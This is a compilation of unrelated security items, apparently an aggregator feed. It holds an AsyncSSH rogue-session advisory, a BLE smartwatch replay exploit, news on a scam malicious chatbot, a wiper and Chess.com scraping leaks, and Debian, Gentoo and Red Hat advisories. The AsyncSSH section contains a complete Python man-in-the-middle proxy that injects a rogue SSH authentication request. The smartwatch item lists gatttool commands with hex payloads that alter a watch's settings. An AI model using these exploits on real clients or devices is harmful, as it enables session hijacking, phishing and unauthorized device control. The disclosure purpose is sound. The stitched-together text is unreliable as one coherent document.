An issue in AsyncSSH v2.14.0 and earlier allows attackers to control the remote end of an SSH client session via packet injection/removal and shell emulation.

**Summary**

An issue in AsyncSSH v2.14.0 and earlier allows attackers to control the remote end of an SSH client session via packet injection/removal and shell emulation.

**Details**

The rogue session attack targets any SSH client connecting to an AsyncSSH server, on which the attacker must have a shell account. The goal of the attack is to log the client into the attacker's account without the client being able to detect this. At that point, due to how SSH sessions interact with shell environments, the attacker has complete control over the remote end of the SSH session. The attacker receives all keyboard input by the user, completely controls the terminal output of the user's session, can send and receive data to/from forwarded network ports, and is able to create signatures with a forwarded SSH Agent, if any. The result is a complete break of the confidentiality and integrity of the secure channel, providing a strong vector for a targeted phishing campaign against the user. For example, the attacker can display a password prompt and wait for the user to enter the password, elevating the attacker's position to a MitM at the application layer and enabling perfect shell emulation.

The attacks work by the attacker injecting a chosen authentication request before the client's NewKeys. The authentication request sent by the attacker must be a valid authentication request containing his credentials. The attacker can use any authentication mechanism that does not require exchanging additional messages between client and server, such as password or publickey. Due to a state machine flaw, the AsyncSSH server accepts the unauthenticated user authentication request message and defers it until the client has requested the authentication protocol.

**PoC**AsyncSSH 2.14.0 client (simple\_client.py example) connecting to AsyncSSH 2.14.0 server (simple\_server.py example)

#!/usr/bin/python3
import socket
from threading import Thread
from binascii import unhexlify
from time import sleep

##################################################################################
\## Proof of Concept for the rogue session attack (ChaCha20-Poly1305)            ##
\##                                                                              ##
\## Variant: Unmodified variant (EXT\_INFO by client required)                    ##
\##                                                                              ##
\## Client(s) tested: AsyncSSH 2.14.0 (simple\_client.py example)                 ##
\## Server(s) tested: AsyncSSH 2.14.0 (simple\_server.py example)                 ##
\##                                                                              ##
\## Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 ##
##################################################################################

\# IP and port for the TCP proxy to bind to
PROXY\_IP \= '127.0.0.1'
PROXY\_PORT \= 2222

\# IP and port of the server
SERVER\_IP \= '127.0.0.1'
SERVER\_PORT \= 22

\# Length of the individual messages
NEW\_KEYS\_LENGTH \= 16
CLIENT\_EXT\_INFO\_LENGTH \= 60
\# Additional data sent by the client after NEW\_KEYS (excluding EXT\_INFO)
ADDITIONAL\_CLIENT\_DATA\_LENGTH \= 60

newkeys\_payload \= b'\\x00\\x00\\x00\\x0c\\x0a\\x15'
def contains\_newkeys(data):
    return newkeys\_payload in data

rogue\_userauth\_request \= unhexlify('000000440b320000000861747461636b65720000000e7373682d636f6e6e656374696f6e0000000870617373776f7264000000000861747461636b65720000000000000000000000')
def insert\_rogue\_authentication\_request(data):
    newkeys\_index \= data.index(newkeys\_payload)
    \# Insert rogue authentication request and remove SSH\_MSG\_EXT\_INFO
    return data\[:newkeys\_index\] + rogue\_userauth\_request + data\[newkeys\_index:newkeys\_index + NEW\_KEYS\_LENGTH\] + data\[newkeys\_index + NEW\_KEYS\_LENGTH + CLIENT\_EXT\_INFO\_LENGTH:\]

def forward\_client\_to\_server(client\_socket, server\_socket):
    delay\_next \= False
    try:
        while True:
            client\_data \= client\_socket.recv(4096)
            if delay\_next:
                delay\_next \= False
                sleep(0.25)
            if contains\_newkeys(client\_data):
                print("\[+\] SSH\_MSG\_NEWKEYS sent by client identified!")
                if len(client\_data) < NEW\_KEYS\_LENGTH + CLIENT\_EXT\_INFO\_LENGTH + ADDITIONAL\_CLIENT\_DATA\_LENGTH:
                    print("\[+\] client\_data does not contain all messages sent by the client yet. Receiving additional bytes until we have 156 bytes buffered!")
                while len(client\_data) < NEW\_KEYS\_LENGTH + CLIENT\_EXT\_INFO\_LENGTH + ADDITIONAL\_CLIENT\_DATA\_LENGTH:
                    client\_data += client\_socket.recv(4096)
                print(f"\[d\] Original client\_data before modification: {client\_data.hex()}")
                client\_data \= insert\_rogue\_authentication\_request(client\_data)
                print(f"\[d\] Modified client\_data with rogue authentication request: {client\_data.hex()}")
                delay\_next \= True
            if len(client\_data) \== 0:
                break
            server\_socket.send(client\_data)
    except ConnectionResetError:
        print("\[!\] Client connection has been reset. Continue closing sockets.")
    print("\[!\] forward\_client\_to\_server thread ran out of data, closing sockets!")
    client\_socket.close()
    server\_socket.close()

def forward\_server\_to\_client(client\_socket, server\_socket):
    try:
        while True:
            server\_data \= server\_socket.recv(4096)
            if len(server\_data) \== 0:
                break
            client\_socket.send(server\_data)
    except ConnectionResetError:
        print("\[!\] Target connection has been reset. Continue closing sockets.")
    print("\[!\] forward\_server\_to\_client thread ran out of data, closing sockets!")
    client\_socket.close()
    server\_socket.close()

if \_\_name\_\_ \== '\_\_main\_\_':
    print("--- Proof of Concept for the rogue session attack (ChaCha20-Poly1305) ---")
    mitm\_socket \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
    mitm\_socket.bind((PROXY\_IP, PROXY\_PORT))
    mitm\_socket.listen(5)

    print(f"\[+\] MitM Proxy started. Listening on {(PROXY\_IP, PROXY\_PORT)} for incoming connections...")

    try:
        while True:
            client\_socket, client\_addr \= mitm\_socket.accept()
            print(f"\[+\] Accepted connection from: {client\_addr}")
            print(f"\[+\] Establishing new server connection to {(SERVER\_IP, SERVER\_PORT)}.")
            server\_socket \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
            server\_socket.connect((SERVER\_IP, SERVER\_PORT))
            print("\[+\] Spawning new forwarding threads to handle client connection.")
            Thread(target\=forward\_client\_to\_server, args\=(client\_socket, server\_socket)).start()
            Thread(target\=forward\_server\_to\_client, args\=(client\_socket, server\_socket)).start()
    except KeyboardInterrupt:
        client\_socket.close()
        server\_socket.close()
        mitm\_socket.close()

**Impact**

The impact heavily depends on the application logic implemented by the AsyncSSH server. In the worst case, the AsyncSSH server starts a shell for the authenticated user upon connection, switching the user to the authenticated one. In this case, the attacker can prepare a modified shell beforehand to perform perfect phishing attacks and become a MitM at the application layer. When the username of the authenticated user is not used beyond authentication, this vulnerability does not impact the connection's security.

CVE-2023-46446: Rogue Session Attack in AsyncSSH

Maxima Max Pro Power with firmware version 1.0 486A suffers from a BLE traffic replay vulnerability that allows for arbitrary unauthorized actions.

    # Exploit Title: Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated)# Date: 13-Nov-2023# Exploit Author: Alok kumar (alokkumar0200@gmail.com), Cyberpwn Technologies Pvt. Ltd.# Vendor Homepage: https://www.maximawatches.com# Product Link: https://www.maximawatches.com/products/max-pro-power# Firmware Version: v1.0 486A# Tested on: Maxima Max Pro Power# CVE : CVE-2023-46916# It was observed that an attacker can send crafted HEX values to “0x0012” GATT Charactristic handle on the watch to perform unauthorized actions like change Time display format, update Time, update notifications.# And since, there is no integrity check for data received by the watch, an attacker can sniff the same value on smartwatch A, which later can be sent to smartwatch B leading unauthorized actions# Scan for bluetooth LE devices nearby using any capable scanner, bluetoothctl is used in this “sudo bluetoothctl scan le”# “sudo gattool -I” Starts gattool in interactive mode.# “connect <MAC_OF_DEVICE_FROM_STEP_1>” Connects to the specified BLE device.# “char-desc” Lists all handles for the device.# Run “mtu 247” in Gatttool after connection to set MTU for active connection.# Run “char-read-hnd 0x0054” in Gatttool. Trust And Authorize the device on attacker's machine when prompted.# "char-write-req 0x0012 ab00000e5422002202002b0009000000059fffffffff" disables Raise to wake feature.# "char-write-req 0x0012 ab00000ec42f002302002b0009010000059fffffffff" enables Raise to wake feature.# "char-write-req 0x0012 ab000009c2ee0034050023000400030501" starts Heart Rate monitor# "char-write-req 0x0012 ab000007c323001902001800020002" sets Time Format to 24 Hrs on smartwatch.# "char-write-req 0x0012 ab0000070022001802001800020006" sets Time Format to 12 Hrs on smartwatch.

Maxima Max Pro Power 1.0 486A BLE Traffic Replay

By Waqas
Abrax666 AI Chatbot is being boasted by its developer as a malicious alternative to ChatGPT, claiming it's a perfect multitasking tool for both ethical and unethical activities.
This is a post from HackRead.com Read the original post: Malicious Abrax666 AI Chatbot Exposed as Potential Scam

As of now, based on the information regarding the sale of the Abrax666 AI Chatbot, cybersecurity researchers are of the opinion that the chatbot is most likely a scam.

As of late October 2023, cybercriminals have been advertising a new malicious AI chatbot called Abrax666 on the **dark web** and underground hacking forums. The developer of the Abrax666 AI chatbot has been boasting about the chatbot claiming it to be a perfect multitasking tool for ethical and unethical activities.

Currently, the pricing structure of the Abrax666 AI chatbot is €299 per month, and €2499 per year, while its source code is available for sale for €4999, however, according to cybersecurity researchers at SlashNext, the Abrax666 chatbot is likely to be fake, and could be an attempt to scam buyers.

Abrax666 Chatbot’s listing (Screenshot credit: Hackread.com)

It is worth noting that after the launch of OpenAI’s ChatGPT chatbot, cybercriminals attempted to exploit it for malicious purposes. In particular, Russian hackers **tried** to leverage the chatbot to create malware and phishing pages. While there was **some success**, to escalate their efforts, cybercriminals launched their own malicious chatbots, including **WormGPT** and **FraudGPT**.

In the latest report, SlashNext’s cybersecurity researcher Daniel Kelley highlighted several red flags indicating how the Abrax666 AI chatbot could be a scam despite the big claims. The chatbot is being sold by a threat actor using the alias Abrax on a notorious Russian-language forum where the rule of sale includes sellers depositing some amount of money to initiate the sales process.

However, Abrax not only did not deposit the funds but also refused to allow interested parties to review the chatbot before making a purchase. One potential buyer using the alias ‘SocketSilence’ stated that Abrax failed to provide any evidence of whether they have sold the chatbot previously or if it actually works.

(Screenshot credit: Hackread.com)

Despite video demonstrations shared by the seller, the authenticity of the chatbot’s capabilities remains in question. The videos, according to Kelley, do not exhibit standard AI chatbot behaviour and appear more like a standard tool.

“The only potentially credible evidence that has caused us to slightly defer our verdict here, are videos being circulated by ‘Abrax’ that allegedly show the AI chatbot in use,” Daniel explained in a **blog post**.

“However, even these videos do not appear to showcase the standard output one would expect from an AI chatbot of this nature. The output appears to look more like a standard tool that is not capable of real-time communication and does not accept prompts but arguments and flags instead,” the researcher added.

Abrax’s attempt to sell the chatbot on other cybercrime forums resulted in the removal of the threat, possibly due to administrators detecting malicious intent. Furthermore, the topic initiated by Abrax was locked by forum administrators at the time of writing.

One of the admins cautioned Abrax about their claims (Screenshot credit: Hackread.com).

Overall, the SlashNext report casts doubt on the legitimacy of the Abrax666 AI chatbot, cautioning potential buyers against its advertised capabilities. However, if the seller provides evidence that their product is legitimate and aligns with the claims they have made, it could likely change the minds of researchers.

****_RELATED ARTICLES_****

1.  **DarkBERT: Enhancing Cybersecurity Efforts on the Dark Web**
2.  **Chinese Scammers Use Fake Loan Apps for Money Laundering**
3.  **Fake Ledger App on Microsoft Store to Stole $800,000 in Crypto**

Malicious Abrax666 AI Chatbot Exposed as Potential Scam

Debian Linux Security Advisory 5548-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in denial of service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5548-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
November 05, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openjdk-17  
CVE ID         : CVE-2023-22025 CVE-2023-22081

Several vulnerabilities have been discovered in the OpenJDK Java runtime,  
which may result in denial of service.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 17.0.9+9-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 17.0.9+9-1~deb12u1.

We recommend that you upgrade your openjdk-17 packages.

For the detailed security status of openjdk-17 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openjdk-17

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVH8rMACgkQEMKTtsN8  
Tjahiw/+KV2CipWhe7kpI5GXnMkCH9lOIYYv6S/zSu3RpB/zEH72QoAfJVRPazNy  
6ubJtk1kbrkc/mo6RFRw+0yVuo8czZ2NiVYc7E+pmVdCu1QT+M1BlV6xhN9KntpY  
pw2V+/+toyi0lmMRl13FgMC9loUdBHJO7zHbfNCKZAQHoBt1JK1UChwKDUC+UeGr  
0A/4wk5gMaKLMizr5nSEXsJS1D0cnAeqogIU42G6MdHTQnF1dTtXOtA3VbS+AnAl  
cPea29ALDnpruizp/7pBCu4q9hGvCrKYHxZ5ZIwfS7shfYSN0qqAtqmsw8ZSnAp6  
MlPwbdKfYWFhujvT3prQEtgPqowK+sMjSRHvjZyXIYrYK6/ORduckVpSHN3Ue3V7  
UcFKiZvVrub6YB9nFB0fbHs7FL4N/Eb75n8B5OzaHM1RrH12NNKWw9aghHEMofQB  
Isai5wglPnERZqDOYuUnrwxBfsRKGbRsYl86wYCnDBYSDtO5o6Fdp5daZBtm40dl  
fo4GoM2FVlkIFKR/xLviQ/l+q8bc3jOcT4ZtgiVlYHD5YuunT9pMxOYHHMF4NeP7  
ve+hB46m3GxVgeu50L3e7bOLEDbsMwXbhzN+IvR1IBNuwEvXUWy0jg4GZJQ30u7b  
l10rG4HjAvcL0U/axHmQcaKZWwd9cc9EfbQMUTJ5UzuSN9YcutA=  
=vysv  
-----END PGP SIGNATURE-----

Debian Security Advisory 5548-1

Gentoo Linux Security Advisory 202311-2 - Multiple vulnerabilities have been discovered in Netatalk, which could lead to remote code execution Versions greater than or equal to 3.1.18 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Netatalk: Multiple Vulnerabilities including root remote code execution  
     Date: November 01, 2023  
     Bugs: #837623, #881259, #915354  
       ID: 202311-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Netatalk, which could  
lead to remote code execution

Background  
==========

Netatalk is a kernel level implementation of the AppleTalk Protocol  
Suite, which allows Unix hosts to act as file, print, and time servers  
for Apple computers. It includes several script utilities, including  
etc2ps.sh.

Affected packages  
=================

Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
net-fs/netatalk  < 3.1.18      >= 3.1.18

Description  
===========

Multiple vulnerabilities have been discovered in Netatalk. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Netatalk users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-fs/netatalk-3.1.18"

References  
==========

[ 1 ] CVE-2021-31439  
      https://nvd.nist.gov/vuln/detail/CVE-2021-31439  
[ 2 ] CVE-2022-0194  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0194  
[ 3 ] CVE-2022-22995  
      https://nvd.nist.gov/vuln/detail/CVE-2022-22995  
[ 4 ] CVE-2022-23121  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23121  
[ 5 ] CVE-2022-23122  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23122  
[ 6 ] CVE-2022-23123  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23123  
[ 7 ] CVE-2022-23124  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23124  
[ 8 ] CVE-2022-23125  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23125  
[ 9 ] CVE-2022-45188  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45188

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-02

Gentoo Linux Security Advisory 202311-1 - A vulnerability has been discovered in GitPython where crafted input to Repo.clone_from can lead to code execution. Versions greater than or equal to 3.1.30 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GitPython: Code Execution via Crafted Input  
     Date: November 01, 2023  
     Bugs: #884623  
       ID: 202311-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in GitPython where crafted input to  
Repo.clone_from can lead to code execution

Background  
==========

GitPython is a Python library used to interact with Git repositories.

Affected packages  
=================

Package               Vulnerable    Unaffected  
--------------------  ------------  ------------  
dev-python/GitPython  < 3.1.30      >= 3.1.30

Description  
===========

Please review the CVE identifier referenced below for details.

Impact  
======

An attacker may be able to trigger Remote Code Execution (RCE) due to  
improper user input validation, which makes it possible to inject a  
maliciously crafted remote URL into the clone command. Exploiting this  
vulnerability is possible because the library makes external calls to  
git without sufficient sanitization of input arguments.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All GitPython users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/GitPython-3.1.30"

References  
==========

[ 1 ] CVE-2022-24439  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24439

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-01

Red Hat Security Advisory 2023-6227-01 - An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6227.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: qemu-kvm security updateAdvisory ID:        RHSA-2023:6227-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:6227Issue date:         2023-11-01Revision:           01CVE Names:          CVE-2023-3354====================================================================Summary: An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Kernel-based Virtual Machine (KVM) is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm packages provide the user-space component for running virtual machines that use KVM.Security Fix(es):* QEMU: VNC: improper I/O watch removal in TLS handshake can lead to remote unauthenticated denial of service (CVE-2023-3354)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-3354References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2023-6227-01

Red Hat Security Advisory 2023-6209-01 - An update for samba is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6209.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: samba security updateAdvisory ID:        RHSA-2023:6209-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:6209Issue date:         2023-10-31Revision:           01CVE Names:          CVE-2023-3961====================================================================Summary: An update for samba is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Samba is an open-source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information.Security Fix(es):* samba: smbd allows client access to unix domain sockets on the file system as root (CVE-2023-3961)* samba: SMB clients can truncate files with read-only permissions (CVE-2023-4091)* samba: \"rpcecho\" development server allows denial of service via sleep() call on AD DC (CVE-2023-42669)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-3961References:https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2023-6209-01

Cybersecurity researchers have warned about a Windows version of a wiper malware that was previously observed targeting Linux systems in cyber attacks aimed at Israel.
Dubbed BiBi-Windows Wiper by BlackBerry, the wiper is the Windows counterpart of BiBi-Linux Wiper, which has been put to use by a pro-Hamas hacktivist group in the wake of the Israel-Hamas war last month.
"The Windows variant [...

Cybersecurity researchers have warned about a Windows version of a wiper malware that was previously observed targeting Linux systems in cyber attacks aimed at Israel.

Dubbed **BiBi-Windows Wiper** by BlackBerry, the wiper is the Windows counterpart of BiBi-Linux Wiper, which has been put to use by a pro-Hamas hacktivist group in the wake of the Israel-Hamas war last month.

"The Windows variant \[...\] confirms that the threat actors who created the wiper are continuing to build out the malware, and indicates an expansion of the attack to target end user machines and application servers," the Canadian company said Friday.

Slovak cybersecurity firm is tracking the actor behind the wiper under the name BiBiGun, noting that the Windows variant (bibi.exe) is designed to overwrite data in the C:\\Users directory recursively with junk data and appends .BiBi to the filename.

The BiBi-Windows Wiper artifact is said to have been compiled on October 21, 2023, two weeks after the onset of the war. The exact method by which it is distributed is currently unknown.

Besides corrupting all files with the exception of those with .exe, .dll, and .sys extensions, the wiper deletes shadow copies from the system, effectively preventing the victims from recovering their files.

Another notable similarity with its Linux variant is its multithreading capability.

"For the fastest possible destruction action, the malware runs 12 threads with eight processor cores," Dmitry Bestuzhev, senior director of cyber threat intelligence at BlackBerry, said.

It's not immediately clear if the wiper has been deployed in real-world attacks, and if so, who the targets are.

The development comes as Security Joes, which first documented BiBi-Linux Wiper, said the malware is part of a "larger campaign targeting Israeli companies with the deliberate intent to disrupt their day-to-day operations using data destruction."

The cybersecurity firm said it identified tactical overlaps between the hacktivist group, who call themselves Karma, and another geopolitically motivated actor codenamed Moses Staff (aka Cobalt Sapling), which is suspected to be of Iranian origin.

"Although the campaign has primarily centered around Israeli IT and government sectors up to this point, some of the participating groups, such as Moses Staff, have a history of simultaneously targeting organizations across various business sectors and geographical locations," Security Joes said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New BiBi-Windows Wiper Targets Windows Systems in Pro-Hamas Attacks

By Waqas
The most recent data leak of Chess.com user records occurred on Friday, November 10th, 2023.
This is a post from HackRead.com Read the original post: Chess.com Faces Second Data Leak: 476,000 Scraped User Records Leaked

Earlier, Chess.com confirmed to Hackread.com that malicious threat actors exploited the “find friends” feature in the platform’s API to extract publically available user data.

On November 10th, 2023, **Hackread.com exclusively reported** that threat actors had disclosed a scraped database containing information from Chess.com users. The database, containing approximately 828,327 users, was leaked on the notorious Breach Forums.

Over the weekend, a different threat actor leaked another scraped database from Chess.com, affecting nearly 500,000 (476,121) users of the widely used online platform for chess enthusiasts and social networking.

Interestingly, this forum also saw another threat actor leaking a **scraped database from LinkedIn** just a couple of days prior on the same forum, which contained information from 25 million users.

Similar to the previous data breach, the latest incident also involves the exposure of sensitive information. The compromised data includes full names, usernames, profile links, email addresses, users’ originating countries, avatar URLs (profile pictures), Universal Unique Identifier (UUID), user IDs, and registration dates.

A screenshot from the data leak displays email addresses along with other information and provides an example of a user profile when the profile URL is clicked. (Credit: Hackread.com)

In a post on Breach Forums, the threat actor specified that the recently published data leak is distinct and unrelated to the previous one involving the 800,000 scraped records.

According to the threat actor, no data from the earlier leak has been incorporated into the current leak. **“Everything was scraped by me and nothing was reused from the 800k leak,”** the actor wrote.

A quick analysis by Hackread.com can confirm the actor’s claims to be authentic and no data was taken from the previous leak.

What the threat actor said on Breach Forums (Credit: Hackread.com)

****Expect 4 Additional Chess.com Data Scrapes****

Since Hackread.com has been monitoring the activities of threat actors on Breach Forums, “DrOne,” the group responsible for the initial Chess.com data leak, has claimed that they have acquired access to four more scraped databases from the site.

According to their claim, these four databases comprise personal information from over 1 million Chess.com users. Nevertheless, it remains uncertain when the databases will be leaked, and whether the actors have any intentions to do so.

****This is not a cyber attack – Chess.com is aware of the issue****

It is crucial to emphasize that Chess.com has not fallen victim to a cyber attack, and its servers have not been compromised by threat actors. In response to the previous scrape leak reported to Hackread.com, Chess.com affirmed its awareness of the issue. The company clarified that threat actors exploited its public API, highlighting that the breach did not involve a direct intrusion into its servers.

“Today, we learned that some bad actors used our API to collect and release some publicly available member data. This was NOT a data breach. Our infrastructure, member accounts, and data such as passwords are secure,” the company said.

“The bad actors used email addresses found outside Chess.com to search our API via the “**find friends”** feature and match email addresses to Chess.com accounts. Those Chess.com usernames, email addresses, and other public information such as the account creation date, and last login date were published,” the representative explained.

****Still A Danger to Chess.com Users****

While it is true that malicious actors have compiled and leaked publicly available information, the inclusion of email addresses in the data poses a significant threat to the site’s users. The leaked information provides a basis for potential malicious activities, such as the creation of fake profiles leading to **identity theft**.

Additionally, threat actors could leverage the exposed data to search for passwords linked to the compromised email addresses in previous data breaches. Furthermore, the presence of email addresses opens the door for **phishing attacks**, where attackers may attempt to deceive users by posing as Chess.com in fraudulent email communications.

****Web Scraping – Not Easy to Defend Against****

**Web scraping**, also known as data scraping, refers to the automated method employed by software to extract information from websites, particularly to gather specific data from web pages. Given the expansive nature of Chess.com as a large website, the process becomes challenging to block.

In an attempt to thwart scraping activities, large websites implement preventive measures like rate limiting and captcha challenges. Despite these measures, scrapers persistently innovate and devise new techniques to overcome these obstacles. However, not all scrapers are malicious; some engage in data collection for research purposes, ranging from studying social networks to developing machine learning models.

****_RELATED ARTICLES_****

1.  **Chess.com flaw allowed access to 50M user records**
2.  **Hackers leak scraped data of 87,000 GETTR users online**
3.  **Scraped data of 1.3 million Clubhouse users published online**
4.  **Twitter Scraping Breach: 209M Accounts Leaked on Hacker Forum**
5.  **API Misuse: Hacker Exposes 2.6M Duolingo Users’ Emails & Names**
6.  **Data scraping firm leaks 235m Instagram, TikTok, YouTube user data**

Tag

#mac